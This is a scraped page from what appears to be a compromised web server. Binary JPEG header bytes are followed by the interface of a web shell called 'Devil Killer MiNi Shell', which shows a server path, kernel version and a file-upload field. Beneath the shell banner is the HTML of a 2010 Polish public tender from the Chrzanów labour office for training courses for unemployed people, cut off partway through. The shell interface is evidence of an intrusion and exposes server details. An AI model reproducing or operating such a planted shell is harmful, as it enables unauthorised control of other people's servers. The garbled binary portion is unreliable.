JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100520/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100520/137396-N-2010.html

<p class="kh_header"><b>Chrzanów: Przeprowadzenie szkoleń grupowych dla osób bezrobotnych zarejestrowanych w Powiatowym Urzędzie Pracy w Chrzanowie.</b><br>
<b>Numer ogłoszenia: 137396 - 2010; data zamieszczenia: 20.05.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiatowy Urząd Pracy w Chrzanowie , ul. Słowackiego 8, 32-500 Chrzanów, woj. małopolskie, tel. 032 7533800, faks 032 7533899.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.pup-chrzanow.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przeprowadzenie szkoleń grupowych dla osób bezrobotnych zarejestrowanych w Powiatowym Urzędzie Pracy w Chrzanowie..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Część 1.  Operator sprzętu ciężkiego: koparko-ładowarka:  - dla   24  osób 
( podzielonych na 2 grupy 12 osobowe) ,  planowany termin realizacji - I i II gr. czerwiec/lipiec  2010. 

Część 2. Specjalista ds. kadr i płac  - dla 24  osób ( podzielonych na 2 grupy 12 osobowe),  planowany termin realizacji - I gr. czerwiec/lipiec;  II gr. październik/listopad  2010. 

Część 3.  Kasjer handlowy  - dla  60  osób ( podzielonych na  4 grupy 15 osobowe), planowany termin realizacji : 
I gr. - czerwiec, II gr. - lipiec, III gr. - wrzesień,  IV gr. - listopad 2010 .  

Część 4.  Spawacz Mag + Tig  - dla  20 osób ( podzielonych na 2 grupy 10 osobowe),  planowany termin realizacji:  I gr. - czerwiec/lipiec  2010; II gr. -  wrzesień/październik 2010.  

Część 5. Agroturystyka z elementami  przedsiębiorczości  - dla  10  osób, planowany termin realizacji -  czerwiec /lipiec 2010.

Część 6. Specjalista ds. pozyskiwania środków unijnych - dla 20 osób, planowany termin realizacji: czerwiec/lipiec 2010.

Część 7. Florystyka z obsługą kasy fiskalnej i elementami prowadzenia własnej firmy  - dla 20 osób, planowany termin realizacji: czerwiec / lipiec 2010. 

Część 8. Nowoczesny sprzedawca - dla 20 osób ( podzielonych na 2 grupy 10 os.), planowany termin realizacji: I gr. - czerwiec / lipiec 2010, II gr. - październik / listopad 2010. 

Część 9.  Obsługa wózka widłowego   - dla 36 osób ( podzielonych na 3 grupy 12 os.), planowany termin realizacji: 
 I gr. - czerwiec, II  gr. - sierpień 2010, III gr. - październik 2010..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 9.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> .</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1. Aktualny wpis do rejestru instytucji szkoleniowych wydany przez Wojewódzki Urząd Pracy właściwy ze względu na siedzibę instytucji szkoleniowej  zgodnie z Rozporządzeniem Ministra Gospodarki i Pracy z dnia 27 października 2004r. w sprawie rejestru instytucji szkoleniowych Dz. U. Nr 236 poz. 2365) - dotyczy wszystkich części zamówienia. 
2 Potwierdzenie spełniania wymagań określonych w § 25 Rozporządzenia Ministra Gospodarki z dnia 20 września 2001r w sprawie bezpieczeństwa i higieny pracy podczas eksploatacji maszyn i innych urządzeń technicznych do robót ziemnych, budowlanych i drogowych ( Dz. U Nr 118 poz.1263), wystawione przez Instytut Mechanizacji Budownictwa i Górnictwa Skalnego - dotyczy części 1  zamówienia.

3. Atest Instytutu Spawalnictwa w Gliwicach uprawniający do szkolenia i egzaminowania spawaczy  - okres ważności atestu nie może być krótszy niż termin realizacji szkolenia  -  dotyczy części  4 zamówienia. 
4. Uprawnienia do prowadzenia szkoleń w zakresie kierowców wózków jezdniowych wydane przez Ośrodek Doskonalenia Kadr w Mysłowicach nadzorowany przez  Ministra właściwego do spraw gospodarki zgodnie z  Rozporządzeniem  Ministra Gospodarki z dnia 10 maja 2002r. w sprawie bezpieczeństwa i higieny pracy przy użytkowaniu wózków jezdniowych z napędem silnikowym ( Dz. U nr 70, poz. 650 z późn. zm.)  - dotyczy części 9 zamówienia.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten zostanie spełniony, jeżeli Wykonawca wykaże się przeprowadzeniem z należytą starannością, co najmniej jednego szkolenia grupowego w  okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy  - w tym okresie - o tematyce tożsamej z przedmiotem zamówienia  dla poszczególnych części zamówienia  ( załącznik nr 5 do SIWZ).</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten zostanie spełniony, jeżeli Wykonawca wykaże,  iż  na czas realizacji zamówienia będzie dysponował  urządzeniami  adekwatnymi do danej  części zamówienia umożliwiającymi realizację szkolenia ( załącznik nr  10 do  SIWZ),Na jednego  uczestnika  musi przypadać  jedno stanowisko  szkoleniowe wyposażone w  niezbędne narzędzia
 i materiały . Każdy z uczestników szkolenia powinien  mieć indywidualny  dostęp do sprzętu  i materiałów wykorzystywanych przy realizacji szkolenia.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten zostanie spełniony, jeżeli Wykonawca wykaże,  iż  na czas realizacji zamówienia będzie dysponował co  najmniej 2 osobami do każdej z części zamówienia, które posiadają adekwatne do zakresu szkolenia  kwalifikacje, wykształcenie,  doświadczenie zawodowe ( załącznik nr 11 do  SIWZ),</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">koncesję, zezwolenie lub licencję</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz narządzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu realizacji zamówienia wraz z informacją o podstawie  dysponowania tymi zasobami</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. Oświadczenie Wykonawcy o spełnaniu warunków udziału w popstęowaniu okreśłonych w art. 22 ust. 1 ustawy  PZP
2. Pisemnie oświadczenie o niezaleganiu z opłacaniem podatków, opłat oraz składek na ubezpieczenie zdrowotne i społeczne.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p><ul class="kh_indent_1">
<li>1 - Cena - 0.70</li>
<li>2 - Doświadczenie wykonawcy - 0.20</li>
<li>3 - Posiadanie certyfikatów jakości usług - 0.10</li>
</ul>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>-  zakresu  usług objętych umową,  w przypadku  zmian przepisów prawa w tym zakresie,
- miejsca realizacji  świadczeń z  zastrzeżeniem lokalizacji na terenie powiatu chrzanowskiego,
-  kadry wykonującej przedmiot zamówienia z przyczyn losowych ( za zgodą Zamawiającego ),
-  terminu przeprowadzenia szkolenia  - w obrębie 1- go miesiąca  dla danej grupy,
  - zmiana ilości  osób  objętych  szkoleniem,
- zmiana  kosztów szkolenia jeżeli te zmiany są korzystne dla  Zamawiającego,
- zmiana kosztu osobogodziny jeżeli  ta  zmiana jest  korzystna dla  Zamawiającego
- zmiany w harmonogramie zajęć pod warunkiem zachowania terminu realizacji umowy zawartej w  § 5 oraz tego  że  plan nauczania będzie obejmował przeciętnie nie mniej niż 30 godzin zegarowych w tygodniu. Termin realizacji zamówienia może ulec zmianie tylko w szczególnie uzasadnionych przypadkach.
Warunkiem dokonania zmiany jest  zawiadomienie o zaistnieniu w/w okoliczności w formie pisemnej .

Ewentualne wprowadzenie wskazanych powyżej zmian do umowy nie może skutkować zwiększeniem wynagrodzenia wynikającego
 z tytułu realizacji umowy.
Zgodę na  dokonanie zmian musi wyrazić każda ze stron.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.pup-chrzanow.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Powiatowy Urząd Pracy, ul. Słowackiego 8, 32-500 Chrzanów.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 27.05.2010 godzina 09:30, miejsce: Dziennik Podawczy - parter, PUP w Chrzanowie, ul. Słowackiego 8, Chrzanów.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> W ramach: środków finansowych z  Europejskiego Funduszu Społecznego projektu Nowe Perspektywy realizowanym w ramach PROGRAMU OPERACYJNEGO KAPITAŁ LUDZKI PRIORYTET VI Rynek pracy otwarty dla wszystkich DZIAŁANIE 6.1 Poprawa   dostępu do zatrudnienia oraz wspieranie aktywności zawodowej w regionie PODDZIAŁANIE 6.1.3 Poprawa zdolności do zatrudnienia oraz podnoszenie poziomu aktywności zawodowej osób bezrobotnych.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Operator sprzętu ciężkiego: koparko-ładowarka..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Przedmiot zamówienia: przeprowadzenie szkolenia dla  24  osób bezrobotnych  podzielonych na dwie grupy  12 osobowe w specjalności: Operator sprzętu ciężkiego: koparko-ładowarka.

2.  Miejsce organizacji szkolenia:  powiat chrzanowski.

W przypadku przeprowadzenia zajęć poza miastem Chrzanów  instytucja szkoleniowa zobowiązuje się zapewnić dowóz uczestnikom szkolenia z Chrzanowa na miejsce odbywania zajęć i z powrotem. Koszt dowozu zostanie  wliczony do ceny szkolenia od jednej osoby i wykazany w odrębnej pozycji w preliminarzu kosztów szkolenia. 

3.Program szkolenia powinien obejmować min.  176  godzin dydaktycznych.  Szkolenie powinno być zorganizowane zgodnie z Rozporządzeniem  Ministra Gospodarki z dnia 20 września 2001r. w sprawie bezpieczeństwa i higieny pracy podczas eksploatacji maszyn i innych urządzeń technicznych do robót ziemnych, budowlanych i drogowych ( Dz. U. Nr 118 poz. 1263), przeprowadzone w oparciu o program zatwierdzony przez Instytut Mechanizacji  Budownictwa
 i Górnictwa Skalnego w Warszawie. 


4. Termin realizacji: I i II grupa -  czerwiec - lipiec


5.Inne postanowienia:
Szkolenie zakończy się egzaminem  wewnętrznym sprawdzającym nabyte przez słuchaczy umiejętności oraz wydaniem dokumentów świadczących  o ukończeniu szkolenia ( zaświadczeń, świadectw, certyfikatów itp. ) W/w dokumenty mają być wydane zgodnie   z Rozporządzeniem Ministra Edukacji i Nauki   z dnia 3 lutego 2006r w sprawie uzyskiwania i uzupełniania przez osoby dorosłe wiedzy ogólnej, umiejętności i kwalifikacji zawodowych w formach pozaszkolnych (Dz.U Nr.31 poz.216). 

Ustala się, że kurs zakończy się egzaminem  przed komisją z Instytutu Mechanizacji Budownictwa i Górnictwa Skalnego. Uczestnicy otrzymają świadectwo Instytutu Mechanizacji Budownictwa i Górnictwa Skalnego oraz książeczkę operatora..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 30.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 0.70</li>
<li>2. Doświadczenie - 0.20</li>
<li>3. Posiadanie certyfikatów jakości usług - 0.10</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Specjalista ds. kadr i płac.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Przeprowadzenie szkolenia dla  24  osób ( podzielonych na 2 grupy 12 osobowe) 
w specjalności Specjalista ds. kadr i płac  

2.  Miejsce organizacji szkolenia:  powiat chrzanowski.

W przypadku przeprowadzenia zajęć poza miastem Chrzanów  instytucja szkoleniowa zobowiązuje się zapewnić dowóz uczestnikom szkolenia z Chrzanowa na miejsce odbywania zajęć i z powrotem. Koszt dowozu zostanie  wliczony do ceny szkolenia od jednej osoby i wykazany w odrębnej pozycji w preliminarzu kosztów szkolenia. 

3.Program szkolenia powinien obejmować 150  godzin dydaktycznych i zawierać następujące moduły:

1	Płaca  - jej funkcje i zasady
2	Elementy i składniki wynagrodzenia za pracę
3	Minimalne wynagrodzenie za pracę
4	Systemy wynagrodzenia za pracę
5	Wzorcowa lista płac - sporządzanie
6	Prawo do wynagrodzenia
7	Ochrona wynagrodzenia za pracę 
8	Wgląd do dokumentacji płacowej
9	Potrącenia z wynagrodzenia za pracę
10	Rozliczenia publicznoprawne
11	Odpowiedzialność pracodawcy przy wypłacie wynagrodzeń
12	Dokumenty zgłoszeniowe, rozliczeniowe i płatnicze
13	Zasady i tryb postępowania w sprawach rozliczenia składek
14	Wypełnianie i przekazywania dokumentów ubezpieczeniowych
15	Zasiłek chorobowy i opiekuńczy
16	Świadczenia rehabilitacyjne
17	Zasiłek macierzyński
18	Zasiłki rodzinne, pielęgnacyjne i wychowawcze
19	Kapitał początkowy - jego istota i zadania 
20	Wniosek ZUS do pracodawców w sprawie kapitału początkowego 
21	Kompletowanie dokumentów do wniosku o ustalenie kapitału początkowego 
22	Ustalenie kapitału początkowego 
23	Instalacja i obsługa programu Płatnik 
24	Prowadzenie akt osobowych i dokumentacji kadrowej. 
25	Dobór i selekcja pracowników
26	Okresowa ocena pracowników
27	Systemy motywacyjne
28	Archiwizacja akt.
29	Ochrona danych osobowych
30	Wybrane zagadnienia prawa pracy i bhp
31	Ubezpieczenia społeczne:
- Zasady podlegania ubezpieczeniom społecznym, - - wypełnianie dokumentów zgłoszeniowych 
i rozliczeniowych, 
- zasady ustalania podstawy wymiaru  składek na ubezpieczenie społeczne i zdrowotne. 

Stosunek liczby godzin praktycznych do ogólnej liczby godzin nie może być mniejszy niż 50%. 

W programie szkolenia muszą być wykorzystane standardy kwalifikacji zawodowych i modułowych programów szkoleń zawodowych  dostępnych pod adresem www.standardyiszkolenia.praca.gov.pl.

Program powinien zawierać wskazane powyżej minimum programowe , które może zostać poszerzone o zagadnienia, które w ocenie Wykonawcy winny być zrealizowane celem odpowiedniego przygotowania uczestników szkolenia,  jednak ogólna liczba godzin nie  może przekroczyć 150. 


7.	 Termin realizacji szkolenia: 

I  grupa - czerwiec/lipiec;  
II gr. październik/listopad  

8.	Inne postanowienia:

Szkolenie zakończy się egzaminem  wewnętrznym sprawdzającym nabyte przez słuchaczy umiejętności oraz wydaniem dokumentów świadczących  o ukończeniu szkolenia ( zaświadczeń, świadectw, certyfikatów itp. ) W/w dokumenty mają być wydane zgodnie   z Rozporządzeniem Ministra Edukacji i Nauki   z dnia 3 lutego 2006r w sprawie uzyskiwania i uzupełniania przez osoby dorosłe wiedzy ogólnej, umiejętności i kwalifikacji zawodowych w formach pozaszkolnych (Dz.U Nr.31 poz.216)..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 25.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 0.70</li>
<li>2. Doświadczenie wykonawcy - 0.20</li>
<li>3. Posiadanie certyfikatów jakości usług - 0.10</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Kasjer handlowy.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.Przedmiot zamówienia: przeprowadzenie szkolenia dla 60 osób bezrobotnych 
( podzielonych na 4 grupy 15 osobowe)  w specjalności: Kasjer handlowy.

2.  Miejsce organizacji szkolenia:  powiat chrzanowski.

W przypadku przeprowadzenia zajęć poza miastem Chrzanów  instytucja szkoleniowa zobowiązuje się zapewnić dowóz uczestnikom szkolenia z Chrzanowa na miejsce odbywania zajęć i z powrotem. Koszt dowozu zostanie  wliczony do ceny szkolenia od jednej osoby i wykazany w odrębnej pozycji w preliminarzu kosztów szkolenia. 

3. Program szkolenia powinien obejmować 30 godzin dydaktycznych i zawierać następujące moduły:

-	Podstawowe zagadnienia z zakresu podatku VAT
-	Kasa fiskalna jako element fiskalizacji w handlu i usługach, typy kas i ich działanie, materiały eksploatacyjne
-	Zajęcia praktyczne
-	Zasady bezpieczeństwa w obrocie produktami żywnościowymi  i przestrzegania zasad higieny  w procesie produkcji
-	Podstawowe zasady higieny ( HACCP )

Stosunek liczby godzin praktycznych do ogólnej liczby godzin nie może być mniejszy niż 50%. 

W programie szkolenia muszą być wykorzystane standardy kwalifikacji zawodowych i modułowych programów szkoleń zawodowych dostępnych pod adresem www.standardyiszkolenia.praca.gov.pl.

Program powinien zawierać wskazane powyżej minimum programowe , które może zostać poszerzone o zagadnienia, które w ocenie Wykonawcy winny być zrealizowane celem odpowiedniego przygotowania uczestników szkolenia, jednak ogólna liczba godzin nie  może przekroczyć 30. 


4.	Termin realizacji szkolenia: 
I gr. - czerwiec, 
